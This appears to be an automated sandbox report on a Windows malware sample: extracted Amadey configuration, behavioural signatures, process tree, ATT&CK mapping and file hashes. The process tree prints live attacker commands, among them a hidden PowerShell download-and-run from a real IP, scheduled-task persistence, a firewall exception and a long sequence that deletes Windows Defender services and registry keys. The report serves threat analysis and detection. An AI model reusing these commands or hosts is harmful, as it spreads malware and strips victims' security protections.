Analysis
-
max time kernel
76s -
max time network
157s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
-
submitted
31/03/2025, 00:07
General
-
Target
2025-03-31_f0d59ff93c834b4dd9c70423cf0d8ef4_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
f0d59ff93c834b4dd9c70423cf0d8ef4
-
SHA1
7633ab95e24c46b6568bd773257130757e1358fb
-
SHA256
3cef458436bf19de30f625d7e55c0d597eeace52c700f18597542b657e43e802
-
SHA512
12b177f57b181307f0da219697efafae7d63b49205ca52fd3b2d1b5a9b78a35f27fc4e7f62f9e074bf0c92d6ace86ebbbf79f83317486f3fc9382b1a9693232e
-
SSDEEP
24576:nqDEvCTbMWu7rQYlBQcBiT6rprG8a05u:nTvC/MTQYxsWR7a05
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Amadey family
-
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
-
Gcleaner family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 4 IoCs
-
Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
-
Possible privilege escalation attempt 2 IoCs
-
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 11 IoCs
-
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Loads dropped DLL 31 IoCs
-
Modifies file permissions 1 TTPs 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in Program Files directory 46 IoCs
-
Drops file in Windows directory 3 IoCs
-
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 10 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Delays execution with timeout.exe 1 IoCs
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
-
Suspicious behavior: LoadsDriver 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of FindShellTrayWindow 4 IoCs
-
Suspicious use of SendNotifyMessage 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-03-31_f0d59ff93c834b4dd9c70423cf0d8ef4_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-03-31_f0d59ff93c834b4dd9c70423cf0d8ef4_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn hjrE7maAvYZ /tr "mshta C:\Users\Admin\AppData\Local\Temp\5BLnvdUhc.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn hjrE7maAvYZ /tr "mshta C:\Users\Admin\AppData\Local\Temp\5BLnvdUhc.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\5BLnvdUhc.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'FD1WJW4JCBAUAG7URZZEBNSDNZV6NJ9U.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\TempFD1WJW4JCBAUAG7URZZEBNSDNZV6NJ9U.EXE"C:\Users\Admin\AppData\Local\TempFD1WJW4JCBAUAG7URZZEBNSDNZV6NJ9U.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\10382310101\h2kC2YI.exe"C:\Users\Admin\AppData\Local\Temp\10382310101\h2kC2YI.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1824 -s 447⤵
- Loads dropped DLL
-
-
-
C:\Users\Admin\AppData\Local\Temp\10382540101\SPOKz5U.exe"C:\Users\Admin\AppData\Local\Temp\10382540101\SPOKz5U.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2060 -s 447⤵
- Loads dropped DLL
-
-
-
C:\Users\Admin\AppData\Local\Temp\10382800101\aezyEBW.exe"C:\Users\Admin\AppData\Local\Temp\10382800101\aezyEBW.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1688 -s 447⤵
- Loads dropped DLL
-
-
-
C:\Users\Admin\AppData\Local\Temp\10382880101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10382880101\apple.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\221.exe"C:\Users\Admin\AppData\Local\Temp\221.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A14E.tmp\A15F.tmp\A160.bat C:\Users\Admin\AppData\Local\Temp\221.exe"8⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\221.exe"C:\Users\Admin\AppData\Local\Temp\221.exe" go9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A1CB.tmp\A1CC.tmp\A1CD.bat C:\Users\Admin\AppData\Local\Temp\221.exe go"10⤵
- Drops file in Program Files directory
-
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
-
-
C:\Windows\system32\timeout.exetimeout /t 111⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y11⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t11⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "Sense"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "Sense"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f11⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f11⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f11⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f11⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete ddrver11⤵
- Launches sc.exe
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10384640101\BCmr6Ki.exe"C:\Users\Admin\AppData\Local\Temp\10384640101\BCmr6Ki.exe"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\10385100101\JmKitiE.exe"C:\Users\Admin\AppData\Local\Temp\10385100101\JmKitiE.exe"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\10385170101\nAM5wkr.exe"C:\Users\Admin\AppData\Local\Temp\10385170101\nAM5wkr.exe"6⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\CMD.exe"CMD" netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\xdwdkernel.exe" WindowsControl ENABLE & exit7⤵
-
-
C:\Windows\system32\cmd.exe"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft Cloud" /tr "C:\Users\Admin\AppData\Roaming\xdwdkernel.exe" /RL HIGHEST & exit7⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc minute /mo 1 /tn "Microsoft Cloud" /tr "C:\Users\Admin\AppData\Roaming\xdwdkernel.exe" /RL HIGHEST8⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\system32\cmd.exe"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "Microsoft DotNet Kernel" /tr "C:\Users\Admin\AppData\Roaming\xdwdmicrosoft.exe" /RL HIGHEST & exit7⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc minute /mo 30 /tn "Microsoft DotNet Kernel" /tr "C:\Users\Admin\AppData\Roaming\xdwdmicrosoft.exe" /RL HIGHEST8⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Users\Admin\AppData\Roaming\xdwdkernel.exe"C:\Users\Admin\AppData\Roaming\xdwdkernel.exe"7⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\10385660101\amnew.exe"C:\Users\Admin\AppData\Local\Temp\10385660101\amnew.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-SQTVP.tmp\Bell_Setup16.tmp"C:\Users\Admin\AppData\Local\Temp\is-SQTVP.tmp\Bell_Setup16.tmp" /SL5="$80174,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT10⤵
-
C:\Users\Admin\AppData\Local\Temp\is-92QFN.tmp\Bell_Setup16.tmp"C:\Users\Admin\AppData\Local\Temp\is-92QFN.tmp\Bell_Setup16.tmp" /SL5="$90174,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT11⤵
-
C:\Windows\SysWOW64\regsvr32.exe"regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\1wlanapi.ocx"12⤵
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\10045350101\kololololo.exe"C:\Users\Admin\AppData\Local\Temp\10045350101\kololololo.exe"8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe"C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe"8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\10045720101\b205feddb2.exe"C:\Users\Admin\AppData\Local\Temp\10045720101\b205feddb2.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10045720101\b205feddb2.exe"9⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\10045730101\55539c2d79.exe"C:\Users\Admin\AppData\Local\Temp\10045730101\55539c2d79.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10045730101\55539c2d79.exe"9⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10386380101\LKAGEY3.exe"C:\Users\Admin\AppData\Local\Temp\10386380101\LKAGEY3.exe"6⤵
-
-
C:\Users\Admin\AppData\Local\Temp\10386410101\bprz1VA.exe"C:\Users\Admin\AppData\Local\Temp\10386410101\bprz1VA.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\wow_6262_build (9).exe"C:\Users\Admin\AppData\Local\Temp\wow_6262_build (9).exe"7⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"8⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\Luma_Crypt_Packlab.exe"C:\Users\Admin\AppData\Local\Temp\Luma_Crypt_Packlab.exe"7⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\10386980101\FOm9tvc.exe"C:\Users\Admin\AppData\Local\Temp\10386980101\FOm9tvc.exe"6⤵
-
-
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {52287961-D2E8-42EC-9C8E-2CFEA36D6FB9} S-1-5-21-3692679935-4019334568-335155002-1000:BCXRJFKE\Admin:Interactive:[1]1⤵
-
C:\Users\Admin\AppData\Roaming\xdwdkernel.exeC:\Users\Admin\AppData\Roaming\xdwdkernel.exe2⤵
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
1AppInit DLLs
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
1AppInit DLLs
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
1Modify Registry
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD56d7adc96b310e80799325edca02ff778
SHA135d97327d3d1c5ce920051d0552b2ee510bb919d
SHA256e5186a04536313599bea259d6fefac44b168d81e08dcc36e54b2c6ff08374efd
SHA512feb351fa6d4f4d342ff8456812fd2c9dfba8122b94e6c2d11ec4b045f4975d9f0dc2b6388d9e4c6d4ab98287bc6dc56369e5c96f10cf0b62ad7a2f81ba821212
-
Filesize
1.1MB
MD53928c62b67fc0d7c1fb6bcce3b6a8d46
SHA1e843b7b7524a46a273267a86e320c98bc09e6d44
SHA256630e00afe98ad4c1db391b74a84b7822a3abb3867a34f2ba163a8bf26d8d4397
SHA5121884b125c89e32b6e5924e87ad9af827ae7e950ac80411e00a58c465eed88060af72142f9c512e0323e1ade46061f56a5247351e1c1d5e268f2ba35b5e447857
-
Filesize
2.0MB
MD528b543db648763fac865cab931bb3f91
SHA1b6688b85d6c6d1bd45a3db2d108b6acf7467b0b4
SHA256701b7ef0b368ddbe9e3d2ddaaaf10284287f38799e536336dc4c821930f13906
SHA5127d514fc036efc8d57d400e7e84f5b565f40dc0f74a536c708b3fe5d6725e5d4541157e29f514e0706fad6d4159e0b863bedf757eca4df3e87927e462502a02d2
-
Filesize
7.6MB
MD57513a5099b2dd05f3cd47334b2f8afdd
SHA11198cca4290a4e3dede31a88e357bc94d14c5662
SHA256ff096cd53de9ffd3d752dadda82211cb85b71799d1c7fe798ecf7350520834af
SHA51228ea726f46b657c97cb8900357ea5aa7eb22d95d52d632758e0c08275f24e934fe644ef68b4ad9cf81d0dccdf2226ae46e098c479c811331a1658698abdb16f5
-
Filesize
1.2MB
MD5646254853368d4931ced040b46e9d447
SHA1c9e4333c6feb4f0aeedf072f3a293204b9e81e28
SHA2565a6764d23bb3d50f08f15b95e214a6dca0afb78e7416a21b72982c3649a49e9e
SHA512485f252cd358ea41be648e013dc3ddeee1e57f8dea3ef42a5c8236a9769e7ebcf8bae1d5a36f55b6fb2cdcbbcf1878eca7d7885b63445cb081688a9512512819
-
Filesize
4.4MB
MD532558056268893627b2a032012585436
SHA1b2c34e5183b4be9de67938b9f6e9467af57c452f
SHA256789a89255ac190fee25b057f0a66b5a288b7f61f6708c3adcc05d8364b53aa77
SHA51225f0c120ceac41a1d418386909862432226393d4aa3c673bdbe72e845389f14bf700ccc82eb1d719ef85f13489862b648ca063278f67aa6ca32fbfaa0888f372
-
Filesize
4.5MB
MD5ddb5b5c2bf85abecf2ddc72f2fac202c
SHA1f043d9d4bccb2f126e2b90266436766c228d9855
SHA2563cdb9456e80ecf9bd068bd4205f95862470050900126d6a3624ad0d80035bdd2
SHA512831b1a71303c07991bfc2a92549626ffb3d4e39681f1a9dcd9add769e52648fd91daa55fc9579a79dc0f30665d65c35c462f224494794679d3f0a09b58736c98
-
Filesize
2.1MB
MD53a975ae4a3d8171856a92bdfad7bc4d2
SHA1443f5e9fed4eccf8f2678ec470ba12e595d818d3
SHA2563e5f345f426d185beb5672e174aa6b05d84c0f0a206ed6cbd325102e4bca7f8e
SHA5128f53fa6b1ff7ecce4bc13fcd5b6516a5a17c0bd4e1b9c7870d3dbd137fed61bd54ad01046b042d82f331aa6d10826e565739d8e5209701ce657a7af25f2d539f
-
Filesize
1.9MB
MD5bbed5d43e4e69a27c137bf5d3c3847f3
SHA117d9b9585f5f00f4f1d53dfc5a6365898023c8a8
SHA256f2792c40162c59b66afea7f6deef975afdce331d51da1a6487e558b30d7db4cf
SHA512cce7d91abae9b4afbbd5419862568b8d6bb354bbdb0b14b5e1dba7bed5d5fe3fd1dc8c644113aa624c4532a73883fcb335384bd44d4c235feafded9bef0a9239
-
Filesize
327KB
MD5dfbc5f5696ac1ed176979706f40923e8
SHA1b3ad04189502558184037ae150f1ae4e50927560
SHA25698d2ce957150f0163bc11537b259e37fda34304aa39702a331fad8070dbf97b5
SHA5120aa50d39b0f1cb7ee9c1e5004ce5aa3905317bdb605f8efdf13977abfce423292fe1acfb698504e36f567604a079c1fde8a1ff60b96141be5b969dfa018ae22f
-
Filesize
9.8MB
MD59a2147c4532f7fa643ab5792e3fe3d5c
SHA180244247bc0bc46884054db9c8ddbc6dee99b529
SHA2563e8b13abf977519f8aa7ced613234a39ee1a39e07a2915c60c09713677ecdeba
SHA512c4513062787175cc942cdb0324c1465957bf4d2c48d68a4896daeb427b936ae8d9c78b88f67c456566e8fc32787b1d8b92b3521f7e47e2e90b3f9e10d8498aba
-
Filesize
847KB
MD5b7d7540b03ab0cf6468034b270b078de
SHA17ce50f45a19cee7f9fdd3e5ef8e907a92b7687b3
SHA256a38bd970e7153a7060bd7f77a656b8ab0a019cf2cbc9c80771db8556d378ee35
SHA512a1f31660053a48e2c3a65790fe32b7fbb2211a8f1a40c85015cb24162f81954f88292e06f6f07d10d0219216fdf51017782c284e7d455159eb27278f18c2e801
-
Filesize
180KB
MD562458154158eb08dd28fdbf62469e4c8
SHA16ce11d490152999b61a5186c8ea0b71a9159a659
SHA256c0fad729097860c1e9777f60c6519c3a772b005b4c6c990534e17a9c51b2d755
SHA51282525e8b80d4b1752fac341772f4ee0e40cc51533b2a50d3128e4071c1be750d5ad8def21b172e70aca1e3908c97a85c561bddd030847f40f2a9963db3b30881
-
Filesize
429KB
MD522892b8303fa56f4b584a04c09d508d8
SHA1e1d65daaf338663006014f7d86eea5aebf142134
SHA25687618787e1032bbf6a6ca8b3388ea3803be20a49e4afaba1df38a6116085062f
SHA512852dcc1470f33bc601a814f61a37c1f5a10071ff3354f101be0ef9aa5ac62b4433a732d02acd4247c2a1819fef9adef7dd6722ee8eb9e8501bac033eb877c744
-
Filesize
3.6MB
MD5e0eb76c6ce5cc3b9d672b89391a27763
SHA12e715355b0f85476ef275907f14d9522529e57f8
SHA256b5cb9010a7b28013748176b189a0fcbaf4e9eb3a167d1326990afc87bd046678
SHA512b47f8ba26c6db87f4424bd33d2f99c12ac48ccbb3fdc36273ace4c87a529141f7a57415c74e5ef7dccca07eb015fdab938db9cd3592aa288a12088e452e8004c
-
Filesize
11.2MB
MD5fe4e4833ef059f2bffe16ed024a461a9
SHA10b1e4cc1762447ee79989c328d2f78dc15e4d33c
SHA256fe0b20c7595251a2b626f8643c29ada476410ddc9d87b9c4dc84f637fe99dc95
SHA512d820afefdb4c6b22491f54678839044a5c6937754868dc5972cc66bb997c7ce5cb87037157e99ac51bb75bb67cbaed0a46b0ce94ac518c3f04f05985dbdc4f16
-
Filesize
6.0MB
MD5632c3c0bf42250d7dd47818f33b24d4f
SHA1f57a0188b0457b03e4cef1c82efdc7e6a9cee3a1
SHA256ba33703aa30995b74f5c84c97eb3483b624082d1987b059ff88ee5eade2af683
SHA512206c0982372c2e42af1603d623994581e7338a0c2cce564a1a6b944fe8a3d3bbad815f5b65783e23f129662c0c64943307c3d585dfb5f6dd53a1fc5512b2d642
-
Filesize
88KB
MD589ccc29850f1881f860e9fd846865cad
SHA1d781641be093f1ea8e3a44de0e8bcc60f3da27d0
SHA2564d33206682d7ffc895ccf0688bd5c914e6b914ea19282d14844505057f6ed3e3
SHA5120ed81210dc9870b2255d07ba50066376bcc08db95b095c5413ec86dd70a76034f973b3f396cafcfaf7db8b916ac6d1cbca219900bb9722cb5d5b7ea3c770a502
-
Filesize
717B
MD5bce181a62da270d88daa89aead42bb42
SHA100d66bea952047bbd7e976ae9ea5bda4b2e03aa4
SHA25623bae8c7beff6e7db7bc4b0c5106217fc730dbe25dc9487f07004d90f5ddf029
SHA5121ea3a0542a575cbedd67e077ca9690c240eedc33e074f9da225dcb7a6aa0b9d92ab9efdeaf7af2148adbf5903a37491e3280b6646575d296065c3c392bbb655b
-
Filesize
1KB
MD5e5ddb7a24424818e3b38821cc50ee6fd
SHA197931d19f71b62b3c8a2b104886a9f1437e84c48
SHA2564734305286027757086ef56b9033319ec92c3756e3ca41d7bf22c631d392e1ea
